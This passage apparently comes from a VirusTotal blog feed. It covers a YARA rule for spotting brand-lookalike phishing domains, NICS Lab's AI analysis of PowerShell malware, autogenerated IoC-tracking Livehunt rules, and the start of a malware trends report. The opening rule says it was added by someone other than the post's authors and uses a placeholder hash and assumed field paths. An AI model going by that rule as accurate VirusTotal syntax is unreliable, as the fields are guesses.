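// favicon (placeholder dhash) whose name, or a SAN in their certificate,
// carries the brand string.
rule brand_favicon_lookalike
{
  meta:
    description = "Our favicon on a domain or certificate SAN carrying the brand name"
    author = "added example, not from the VirusTotal post"

  condition:
    // perceptual hash of the favicon (placeholder value; assumed field: favicon.dhash)
    vt.net.domain.favicon.dhash == "0e1e3e3e3e3e1e0e" and
    (
      // brand string as a label or label fragment of the domain, e.g. examplebank-login.com
      vt.net.domain.raw matches /(^|[.-])examplebank([.-]|$)/i or
      // or inside any subject alternative name of the certificate (assumed field path)
      for any san in vt.net.domain.https_certificate.extensions.subject_alternative_name : (
        san icontains "examplebank"
      )
    )
}
```

<div class="interval_12">Take the dhash from your own domain’s report rather than computing it locally, so that it matches the way VirusTotal hashes favicons. The second rule deliberately does not require new_domain: an old domain that suddenly starts serving your favicon is exactly the case you want to be told about.</div>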
<br />
<h2 style="text-align: left;">Wrapping up</h2>
<div class="interval_12">At VirusTotal we continue to add functionality that is useful for analysts doing threat hunting. Our goal is to make their work easier and help them spend their time on the platform wisely.
</div>
<div class="interval_12">The idea behind this new feature is to keep adding fields that can be consumed through VirusTotal Intelligence, making Livehunt rule creation more powerful. It is not easy to remember which fields are available for each entity when writing Livehunt rules, and the new "Structure" functionality helps with exactly that.
</div>
<div class="interval_12">We want Livehunt rules to be a great tool for detecting campaign patterns and tracking threat actors more effectively.
</div>
<div class="interval_12">We would also like to announce that we have opened a GitHub repository where the community can publish and contribute YARA rules. Over the following weeks we will be posting new rules at <a href="https://github.com/VirusTotal/vt-public-crowdsourced-yara" target="_blank">https://github.com/VirusTotal/vt-public-crowdsourced-yara</a>.
</div>
<div class="interval_12">We hope you liked this functionality. Happy hunting!
</div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
.my-yara-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: #F7F9F9;
color: Black;
/*padding: 24px;*/
border-collapse: collapse;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
mark.dark-blue {
color:Blue;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_10 {
width: 10%;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_90 {
width: 90%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>
Joseliyo Sánchezhttp://www.blogger.com/profile/15205592295367780978noreply@blogger.comtag:blogger.com,1999:blog-6871606241422173914.post-31114789853430910482023-08-04T11:01:00.001+02:002023-08-04T11:06:15.352+02:00Crowdsourced AI += NICS Lab<p>We are pleased to share that <a href="https://www.nics.uma.es/" style="color: #1155cc; text-decoration: none;">NICS Lab</a>, a security research group from the Computer Science Department at the University of Malaga, is joining the Crowdsourced AI initiative at VirusTotal. By extending our capabilities using a different AI model for processing PowerShell files, NICS Lab not only strengthens our collective understanding of the code and its behavior, but also provides verdicts on the potential threat level of each file according to model criteria - categorizing them as malicious, suspicious, or benign.</p>
<p>As a reminder, <a href="https://blog.virustotal.com/2023/07/virustotal-crowdsourced-ai.html" style="color: #1155cc; text-decoration: none;">Crowdsourced AI</a> is VirusTotal's initiative that taps into the power of diverse AI models and community contributions to fortify our cyber defense strategies. Just two weeks ago, we announced the integration of Hispasec's solution, which is specifically designed for analyzing Microsoft Office documents. As we have explained in the past, these solutions based on AI LLMs can make mistakes, but their contributions are very valuable in complementing other technologies in the analysis and detection of new threats.</p>
<p>This time, the solution offered by NICS Lab serves as a complement to the code explanations already generated by <a href="https://blog.virustotal.com/2023/05/vt-code-insight-updates-and-q-on.html" style="color: #1155cc; text-decoration: none;">Code Insight</a>, which is based on <a href="https://ai.google/discover/palm2/" style="color: #1155cc; text-decoration: none;">Google PaLM</a>. As a result, numerous PowerShell file reports will now benefit from the insight of solutions based on two distinct AI models. This essentially encapsulates VirusTotal’s strategy of embracing diverse threat detection solutions to improve understanding and risk assessment.</p>
<p>Let's explore a few examples:</p>
<p>In this first showcase, we see that two analyses appear in the Crowdsourced AI section: one from NICS Lab and the other from Code Insight. In the case of the former, in addition to the explanation about the file's behavior, we can observe the "Malicious" verdict highlighted in red.</p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggj_UxyhxpH85vEPohTDqJs5eih24BBfHKKCWaHuyVHh_-ykKL1ePBKWiu_Y8BBIGjYnnLDeqcDNhmPBUgpuu6RalTDw2g5jIwF7ftbt0UU-ncEFzec8_0T-BRj9HINQnpkzbK0Ux4dxBMUOfD_nMeOsuKqKt34_HSSGpiboHfaid-kYTmiU2EkC5hxAE/s1600/01Example.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="878" data-original-width="1372" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggj_UxyhxpH85vEPohTDqJs5eih24BBfHKKCWaHuyVHh_-ykKL1ePBKWiu_Y8BBIGjYnnLDeqcDNhmPBUgpuu6RalTDw2g5jIwF7ftbt0UU-ncEFzec8_0T-BRj9HINQnpkzbK0Ux4dxBMUOfD_nMeOsuKqKt34_HSSGpiboHfaid-kYTmiU2EkC5hxAE/s1600/01Example.png"/></a></div>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><a href="https://www.virustotal.com/gui/file/f3642eacb95ad7272d5485bc1fbcd7ebb872ebd72e27fc60e0e79d5643006663/detection" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">f3642eacb95ad7272d5485bc1fbcd7ebb872ebd72e27fc60e0e79d5643006663</span></span></a></p></center>
<p>Similar example, this time with a ransomware case. Here we can see how both models, despite aligning on the overall analysis, complement each other by providing diverse details. The first model, for instance, outlines the file extensions that are encrypted by the ransomware, while the second model highlights the email where the ransom is demanded.</p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkZRkJ6pwouNICdY7q_c6gy-4ZKfT_GD-EbEZ4sRwXWOHm-QM4-p6V72O0deQbxYaBIvVpnk4UEFAwHR8Asj1XqL18XLHmWUE-qWYtK75p3nHwoWr-L59ONNJnYECqyplqpygOsKlggwjL9uuso6liwZOMuFl2-7QDwvf3624EWrV2lX9FTk6FgeffEUU/s1600/02Example.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="1095" data-original-width="1372" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkZRkJ6pwouNICdY7q_c6gy-4ZKfT_GD-EbEZ4sRwXWOHm-QM4-p6V72O0deQbxYaBIvVpnk4UEFAwHR8Asj1XqL18XLHmWUE-qWYtK75p3nHwoWr-L59ONNJnYECqyplqpygOsKlggwjL9uuso6liwZOMuFl2-7QDwvf3624EWrV2lX9FTk6FgeffEUU/s1600/02Example.png"/></a></div>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><a href="https://www.virustotal.com/gui/file/ff68ade91babb31db87a5dcb5b1f650cb429ae6eb7d291cda4c0d92e76c5101c/detection" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">ff68ade91babb31db87a5dcb5b1f650cb429ae6eb7d291cda4c0d92e76c5101c</span></span></a></p>
</center>
<br>
<p>The next example shows how the models behave when analyzing a PowerShell file where attackers obfuscated the code by separating the text strings that constitute the instructions, and using a function to replace the encoded strings with their actual values at runtime.</p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ8qntNuKAkUYw5YHD35n2fa21eDRkpMTn135G57ofODix2_j96HDgVGYGr01FLqN04IHkeLgeXSVrDgZtfbS49xptU0Zw2aZkSiqQDEnHoq69Qasyxly-Wd39y9Od9FWTQG0sld5ASH62wSKkQxT6XQgjmYxb5GRkIejPt3l6QpZzyxAwwUzxxvHDM90/s1600/Example%203.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="379" data-original-width="2787" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ8qntNuKAkUYw5YHD35n2fa21eDRkpMTn135G57ofODix2_j96HDgVGYGr01FLqN04IHkeLgeXSVrDgZtfbS49xptU0Zw2aZkSiqQDEnHoq69Qasyxly-Wd39y9Od9FWTQG0sld5ASH62wSKkQxT6XQgjmYxb5GRkIejPt3l6QpZzyxAwwUzxxvHDM90/s1600/Example%203.png"/></a></div>
</center>
<br>
<p>As we can see, the sample manages to evade detection by antivirus engines, but the models succeed in deobfuscating its code, analyzing it, and providing an explanation of its behavior.</p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjagwnx-Pye6ioA3FCgXg4PXVwMfCllHELTnzmkWpA_2otYvoRVRbsT2q2WIkos4psvjtq846fd_TzM63-zVJeRMVabRT1hie3pFwQc1rAuFsa277cXgUL_jVQUczZEFUIsAqbE1rduJPU4nJFdUgRsU-RrjZGMjsS7D1umw_vzKv83ipEh6GrePVOf3_Q/s1600/03Example.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="1319" data-original-width="1844" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjagwnx-Pye6ioA3FCgXg4PXVwMfCllHELTnzmkWpA_2otYvoRVRbsT2q2WIkos4psvjtq846fd_TzM63-zVJeRMVabRT1hie3pFwQc1rAuFsa277cXgUL_jVQUczZEFUIsAqbE1rduJPU4nJFdUgRsU-RrjZGMjsS7D1umw_vzKv83ipEh6GrePVOf3_Q/s1600/03Example.png"/></a></div>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><a href="https://www.virustotal.com/gui/file/48a7c59575f61e568dbc997db09c707f5b04abfe847d19c084ce955b4f97e648/detection" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">48a7c59575f61e568dbc997db09c707f5b04abfe847d19c084ce955b4f97e648</span></span></a></p></center>
<p>AI reports’ results are available via VT Intelligence, allowing the use of the "nics_ai_analysis:" modifier to search into the resulting AI’s output, and "nics_ai_verdict:" to search by verdict - malicious, suspicious, or benign. As an example, below we show the results of searching for NICS Lab reports where "telegram" is mentioned and the verdict is "malicious". This search is performed using the following query: nics_ai_analysis:telegram and nics_ai_verdict:malicious.</p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwIqFVFX5tj9ibO7bOV2VDzEd-FoYK-mx_BYfyxDSAd9Aq0sF19YMdVU7qwKq2ylhk7Nw5YBbxmsA-v0FAbUMww8pkKVem7XZcI-BBNKULufZUkDos_Yeuo2L6RECKCW6bsuwMjuuwVn3tC5nBd4djkbVcyiKvTUxwzmZzYMmUxsqsUo-pxDwOzjsiXXY/s1600/04%20Example.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="1540" data-original-width="1767" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwIqFVFX5tj9ibO7bOV2VDzEd-FoYK-mx_BYfyxDSAd9Aq0sF19YMdVU7qwKq2ylhk7Nw5YBbxmsA-v0FAbUMww8pkKVem7XZcI-BBNKULufZUkDos_Yeuo2L6RECKCW6bsuwMjuuwVn3tC5nBd4djkbVcyiKvTUxwzmZzYMmUxsqsUo-pxDwOzjsiXXY/s1600/04%20Example.png"/></a></div></center>
<br>
<p>Here is the analysis of the first file that appears in the previous search:</p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxw5rOxBYUOXlhNBtsK6iqg5qhFQuNnUHabP0dN7r46j8hCBzKC1UphWXYtUoPCkIhUHoSJQ7NApMmnm6RFKEee1cmK1iLhOTDhlLC26EfPunHQJ-bGVV8dXWQ7K7a1C4hY1a7viuRvzXvsihPRP9Ll9n2_oZ0u3QpXzlsELJUblJ6MB7MZRojqAF_PmY/s1600/05%20Example.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="739" data-original-width="1823" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxw5rOxBYUOXlhNBtsK6iqg5qhFQuNnUHabP0dN7r46j8hCBzKC1UphWXYtUoPCkIhUHoSJQ7NApMmnm6RFKEee1cmK1iLhOTDhlLC26EfPunHQJ-bGVV8dXWQ7K7a1C4hY1a7viuRvzXvsihPRP9Ll9n2_oZ0u3QpXzlsELJUblJ6MB7MZRojqAF_PmY/s1600/05%20Example.png"/></a></div>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><a href="https://www.virustotal.com/gui/file/acc91fccb084496ae0d0864c90d3ae99493cf638189995fb4d8d9f4ecbbf7a52" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">acc91fccb084496ae0d0864c90d3ae99493cf638189995fb4d8d9f4ecbbf7a52</span></span></a></p></center>
<p>Similarly, the rest of AI models have specific search parameters, such as "hispasec_ai_analysis:", "hispasec_ai_verdict:", and "codeinsight:". Moreover, there are two additional parameters that enable simultaneous searching across all Crowdsourced AI models: "crowdsourced_ai_analysis:" and "crowdsourced_ai_verdict:".</p>
<p>We want to express our gratitude to NICS Lab, for their contribution to the VirusTotal Crowdsourced AI initiative, and congratulate the School of Computer Science and Engineering of the University of Malaga for launching Spain's first-ever degree combining Cybersecurity and Artificial Intelligence. As we forge ahead, welcoming more contributors with diverse skill sets, we remain steadfast in our commitment to building a collaborative, powerful, and diverse defense strategy to tackle the ever-evolving cyber threats. We encourage others to join us in this endeavor.</p>
Bernardo.Quinterohttp://www.blogger.com/profile/17288490159411812678noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-69760570423792378332023-08-01T15:00:00.010+02:002023-08-01T15:03:45.529+02:00Actionable Threat Intel (V) - Autogenerated Livehunt rules for IoC tracking<div class="interval_12">As we <a href="https://blog.virustotal.com/2023/07/actionable-threat-intel-iv-yara-beyond.html" target="_blank">previously discussed</a>, YARA Netloc uncovers a whole new dimension for hunting and monitoring by extending YARA support to network infrastructure. All VirusTotal users already have access to different resources, including <a href="https://blog.virustotal.com/2023/07/actionable-threat-intel-iii-introducing.html" target="_blank">templates</a>, a <a href="https://github.com/VirusTotal/vt-public-crowdsourced-yara" target="_blank">GitHub repository</a>, and the <a href="https://developers.virustotal.com/docs/nethunt" target="_blank">official documentation</a> to quickly get started on writing network YARA rules.
</div>
<div class="interval_12">
You can also find excellent external resources, like <a href="https://s1.ai/netloc" target="_blank">this blog post</a> from SentinelOne's Tom Hegel, which discusses the use of YARA Netloc in a real investigation.
</div>
<div class="interval_12">
And as we highlighted in our previous post, this is just the beginning. We are playing with new ideas and features that leverage YARA Netloc, and we couldn't resist implementing a few of them already. In this blog, we will discuss a new functionality that uses YARA Netloc to help us track indicators of compromise (IoCs) and their related infrastructure with just a few clicks.
</div>
<br />
<h2 style="text-align: left;">IoCs subscription</h2>
<div class="interval_12">
You might have noticed that all IoC reports in VirusTotal have a new <b>Follow</b> dropdown menu in the top right corner, which offers a few options.
</div>
<div class="central_img width_80 interval_12">
<img src="https://lh5.googleusercontent.com/RGAJnxzqnybmC-sKwIZTHaYTeR05ydd8hirRP0C6zZT6inn-mNv6Njl8kQfFENv1fZV9iptSjfXv3b7HthMKSqPmjOYzqTLk0ubD1b8mDHrxu-LDl5S0low5esUGoMlKkrf57b3ZEREKDZ_Hdw-RBhiIs9jYva1fxICKZ8qSa1mrsH5i5ja2igFKru5S9Wdi3q_TljhHKQdJvUkWeKVK4Mn0Xou6NijCts7WeA" />
</div>
<div class="interval_12">
The idea of this new feature is to offer VirusTotal’s users an easy way to track any IoC’s activity. For instance, as shown in the previous screenshot, we can choose to monitor any infrastructure this malware interacts with in the future (URLs, domains or IPs), or to be notified whenever we see it being downloaded from anywhere.
</div>
<div class="interval_12">
When clicking any of these options, we are creating a one-click <a href="https://www.virustotal.com/gui/hunting/rulesets" target="_blank"><b>Livehunt</b></a> rule based on a template. We can customize the resulting rule as needed, or simply deploy it as suggested, although we highly recommend renaming it to easily identify it.
</div>
<div class="interval_12">
For example, by clicking <b>URLs downloading it</b> in the previous <a href="https://www.virustotal.com/gui/file/2cb42e07dbdfb0227213c50af87b2594ce96889fe623dbd73d228e46572f0125" target="_blank">sample’s report</a>, the following rule will be automatically generated and deployed in our Livehunt:
</div>
<div class="my-yara-code interval_12">
<mark class="blue">import</mark> <mark class="red">"vt"</mark><br /><br />
<mark class="blue">rule</mark> UrlDownloadsFile <mark class="dark-blue">{</mark><br />
<mark class="blue">condition</mark>:<br />
<mark class="orange">// vt.net.url.new_url and // enable to restrict matches to newly seen URLs</mark> <br />
vt.net.url.downloaded_file.sha256 == <mark class="red">"2cb42e07dbdfb0227213c50af87b2594ce96889fe623dbd73d228e46572f0125"</mark> <br />
<mark class="dark-blue">}</mark>
</div>
<div class="interval_12">
This rule will simply track and notify any new URL VirusTotal observes downloading that particular sample.
</div>
<br />
<h2 style="text-align: left;">Livehunt dashboard</h2>
<div class="interval_12">
The <a href="https://www.virustotal.com/gui/hunting/rulesets" target="_blank"><b>Livehunt</b> dashboard</a> consolidates all your team's and your own Livehunt YARA rules in one place. We added three filtering options to help you quickly move around.
<div class="central_img width_40 interval_12">
<img src="https://lh5.googleusercontent.com/EdoOAmk3zh9e6dTlb_pP-ECsvT-zR_xryNEQYKT62Hde219SEDnktPau9yh7OagZG2OfMAonMjstXRJH1WYOg_Y7jqnWHmrpuo8mXA7In8iGpCuFx-an0cxY3kelgAl9P5oV8LOHtAGdr1QkiEt4GaYmoVO_g-eSk14DDw5-UUvketbLGrwgCk7KO50Qlsq9ZiorA5eRTmleZaJ-AKMZsPwIvnuLK8zQUneQbg" />
</div>
<ul>
<li>The first one filters rules <b>created by yourself</b>, <b>created by other users</b> in your VirusTotal group and shared with you, or “<b>Autogenerated</b>” with the IoC’s report <b>Follow</b> option, as previously explained.</li>
<li>The second filter allows you to search for rulesets containing a specific substring in their name or anywhere else in the ruleset, including comments. For example, if we use the hash of the file in the previous example (2cb42e07dbdfb0227213c50af87b2594ce96889fe623dbd73d228e46572f0125), we get the rule we previously created. Please note that VirusTotal will automatically add tags corresponding to the names of the rules in a ruleset, plus the "<b>Autogenerated</b>" tag if the ruleset was generated with the <b>Follow</b> option:
<div class="central_img width_80 interval_12">
<img src="https://lh5.googleusercontent.com/nGfXbBCd7V9qfhlWz2rIlnIX_SxY4epTftNdUD81mnf3R3AbHpemrIiPGeuyP-SldK6bkHHm6uq00-Gg6gwrlRSJOX2dJjwtoLT8zxdvswpkRn_RO99rIHFj-1QOv1ni_1XDE5ntw5FreinGWKc8MYFPoLZXo-Pw6Wp9QtRf4PKl8QTpfbN4b12pModHrZvA1aDRk1gZcKSTbEaZXnVKouBXdBWDEtK4T8hwfw" />
</div>
</li>
<li>The third one allows you to filter by ruleset status (active or inactive).</li>
</ul>
</div>
<br />
<div class="interval_12">
The dashboard also shows whether each ruleset is active, as well as the entity type the ruleset matches against. You can also find which users and groups the ruleset was shared with and, lastly, the number of matches; clicking it lists all matching IoCs in the <a href="https://www.virustotal.com/gui/ioc-notifications/all?order=date-" target="_blank"><b>IoC Stream</b></a>.
</div>
<div class="central_img width_80 interval_12">
<img src="https://lh6.googleusercontent.com/V7TsovoZbOLYpemCVa7s_w7Md0mnVnWLCYbG0Qj0TCacPfxboUu28WIlBN3Ex3MYZDgGF-jHJTSzT1G2p7UcI3jgcUZ2vWSTcxNbGPiS4pGwvPfaCeppzd333z0dT4UqolA426aIRDvvhuvSVGNFk2jhd97uuNo_FE_8Cps74bSvjd6Eu1X-yPWhOA0-GHYgbvZwwE5DmkOc2crM0qAbBd1oWMRSW13kDpWcCQ" />
</div>
<br />
<h2 style="text-align: left;">Wrapping up</h2>
<div class="interval_12">
In the previous posts in our "<b>Actionable Threat Intel</b>" series we showed how to use the new <a href="https://blog.virustotal.com/2023/07/actionable-threat-intel-iii-introducing.html" target="_blank"><b>YARA editor</b></a>, how to deploy Livehunt rules from the editor either using templates or from scratch, how to use <a href="https://blog.virustotal.com/2023/07/actionable-threat-intel-iv-yara-beyond.html" target="_blank"><b>Netloc</b></a> for creating network hunting rules, and how to track IoCs of interest with automatically generated hunting rules.
</div>
<div class="interval_12">
All these elements help us set up the monitoring rulesets we need to stay on top of our investigations or of any malicious activity set of interest. <a href="https://www.virustotal.com/gui/ioc-notifications/files?order=date-" target="_blank"><b>IoC Stream</b></a> serves as a single repository that centralizes all our notifications, including those coming from Hunting rules, <a href="https://www.virustotal.com/gui/threat-landscape/collections?order=lookups_trend-" target="_blank"><b>IoC Collections</b></a> and <a href="https://www.virustotal.com/gui/threat-landscape/threat-actors?search_scope=All%20threat%20actors&order=last_seen_date-" target="_blank"><b>Threat Actors</b></a> subscriptions.
</div>
<div class="interval_12">
Last but not least, we would like to give special thanks to our colleagues from Mandiant and to all the security researchers who kindly offered to help during the early stages and beta testing, helping make Netloc hunting as good as possible: <br />
Paul Rascagneres (@r00tbsd), Volexity<br />
Ariel Jungheit (@arieljt), Kaspersky<br />
Marc Green (@green0wl), eBay<br />
Vitor Ventura, Cisco<br />
Markus Neis (@markus_neis), Arctic Wolf<br />
Matt Pierce, CrowdStrike<br />
Pasquale Stirparo (@pstirparo), Independent Researcher<br />
Tom Hegel (@TomHegel), SentinelLabs<br />
</div>
<div class="interval_12">
We hope you find these features as useful as we do. If you have any questions or requests please do not hesitate to <a href="https://www.virustotal.com/gui/contact-us/other" target="_blank">contact us</a>.
</div>
<div class="interval_12">
Happy hunting!
</div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
.my-yara-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: #F7F9F9;
color: Black;
/*padding: 24px;*/
border-collapse: collapse;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
mark.dark-blue {
color:Blue;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_10 {
width: 10%;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>
Alexandra Martinhttp://www.blogger.com/profile/08447900589635774086noreply@blogger.comtag:blogger.com,1999:blog-6871606241422173914.post-626854912266654172023-07-26T17:07:00.006+02:002023-08-01T20:04:46.799+02:00VirusTotal Malware Trends Report: Emerging Formats and Delivery Techniques<span id="docs-internal-guid-a3adb4e5-7fff-7a42-e355-202413b6b8c9"><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face=""Google Sans", sans-serif" style="background-color: transparent; color: #4d4d4d; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">We just released a new edition of our “VirusTotal Malware Trends Report” series, where we want to share VirusTotal’s visibility to help researchers, security practitioners and the general public better understand the nature of malicious attacks, this time focusing on “Emerging Formats and Delivery Techniques”. 
Here are some of the main ideas presented there:</span></p><ul style="margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-wrap: wrap; vertical-align: baseline;">Email attachments continue to be a popular way to spread malware.</span></p></li><li aria-level="1" dir="ltr" style="font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-wrap: wrap; vertical-align: baseline;">Traditional file types (Excel, RTF, CAB and compressed formats) are becoming less popular. 
</span><span style="background-color: white; color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-wrap: wrap; vertical-align: baseline;">Although the use of PDFs has slowly decreased over the last few months, in June 2023 we observed the biggest peak of the last two years.</span></p></li><li aria-level="1" dir="ltr" style="font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-wrap: wrap; vertical-align: baseline;">OneNote and JavaScript (distributed alongside HTML) are the most rapidly growing formats for malicious attachments in 2023.</span></p></li><li aria-level="1" dir="ltr" style="font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-wrap: wrap; vertical-align: baseline;">OneNote emerged in 2023 as a reliable alternative for attackers to the traditional use of macros in other Office products.</span></p></li><li aria-level="1" dir="ltr" style="color: #1f1f1f; font-family: "Google Sans", sans-serif; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; 
list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-wrap: wrap; vertical-align: baseline;">ISO files used for spreading malware are a flexible alternative for both widespread and targeted attacks. Distribution as heavily compressed attachments makes them difficult for some security solutions to scan.</span></p></li><li aria-level="1" dir="ltr" style="font-family: "Google Sans", sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="background-color: white; line-height: 1.38; margin-bottom: 6pt; margin-top: 0pt;"><span style="background-color: transparent; color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; 